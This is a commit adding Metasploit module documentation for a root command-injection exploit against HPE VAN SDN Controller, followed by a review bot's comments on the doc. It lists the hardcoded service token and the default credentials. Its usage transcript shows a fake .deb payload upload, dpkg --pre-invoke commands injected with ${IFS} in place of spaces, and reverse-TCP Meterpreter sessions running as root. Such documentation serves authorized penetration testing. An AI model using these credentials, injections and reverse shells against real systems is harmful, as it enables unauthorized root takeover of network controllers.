Add module doc

GSoC/Meterpreter_Web_Console
William Vu 2018-07-03 18:31:43 -05:00
parent 41b0adad88
commit 12a0aaeaf1
1 changed file with 85 additions and 0 deletions

@ -0,0 +1,85 @@
## Intro
This module exploits a hardcoded service token or default credentials in
HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.
A root command injection was discovered in the uninstall action's name
parameter, obviating the need to use sudo for privilege escalation.
If the service token option `TOKEN` is blank, `USERNAME` and `PASSWORD`
will be used for authentication. An additional login request will be
sent.
## Setup
Follow <http://h22208.www2.hpe.com/eginfolib/networking/docs/sdn/sdnc2_6/5998-8473install/content/s_download_sw.html>.
Tested on 2.7.18.0503.
## Options
**TOKEN**
Set this to the service token. Defaults to `AuroraSdnToken37`.
**USERNAME**
Set this to the service username. Defaults to `sdn`.
**PASSWORD**
Set this to the service password. Defaults to `skyline`.
## Usage
```
msf5 > use exploit/linux/http/hp_van_sdn_token
msf5 exploit(linux/http/hp_van_sdn_token) > set rhosts 192.168.56.102
rhosts => 192.168.56.102
msf5 exploit(linux/http/hp_van_sdn_token) > set target Linux Dropper
target => Linux Dropper
msf5 exploit(linux/http/hp_van_sdn_token) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/hp_van_sdn_token) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(linux/http/hp_van_sdn_token) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with service token AuroraSdnToken37
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:34468) at 2018-07-03 18:23:08 -0500
[+] Deleted /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 192.168.56.102
OS : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Background session 1? [y/N]
msf5 exploit(linux/http/hp_van_sdn_token) > set token ""
token =>
msf5 exploit(linux/http/hp_van_sdn_token) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with creds sdn:skyline
[+] Logged in with auth token 26d7b53a73a9455eae63c346321bfe31
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:34474) at 2018-07-03 18:24:47 -0500
[+] Deleted /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
meterpreter >
```
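Review bot: The install link under ## Setup points into the sdnc2_6 documentation tree (`.../sdn/sdnc2_6/5998-8473install/content/s_download_sw.html`) while the same section says "Tested on 2.7.18.0503" and the Intro gives the affected range as <= 2.7.18.0503; either link the install guide for the 2.7 release or add a sentence saying the 2.6 guide is the one to follow when building a 2.7.18.0503 lab target, so a reader does not set up the wrong version. Two smaller points in the same hunk: the Usage transcript runs `set target Linux Dropper`, but the doc never lists the module's targets, so a short note on the available targets and the default one belongs alongside the TOKEN, USERNAME and PASSWORD entries in ## Options; and the injected command in the log replaces every space with `${IFS}` (`dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/...`), which the Intro's single sentence about "a root command injection ... in the uninstall action's name parameter" does not explain. A sentence in ## Intro on why the module avoids literal whitespace in the injected command would make the transcript readable without opening the module source.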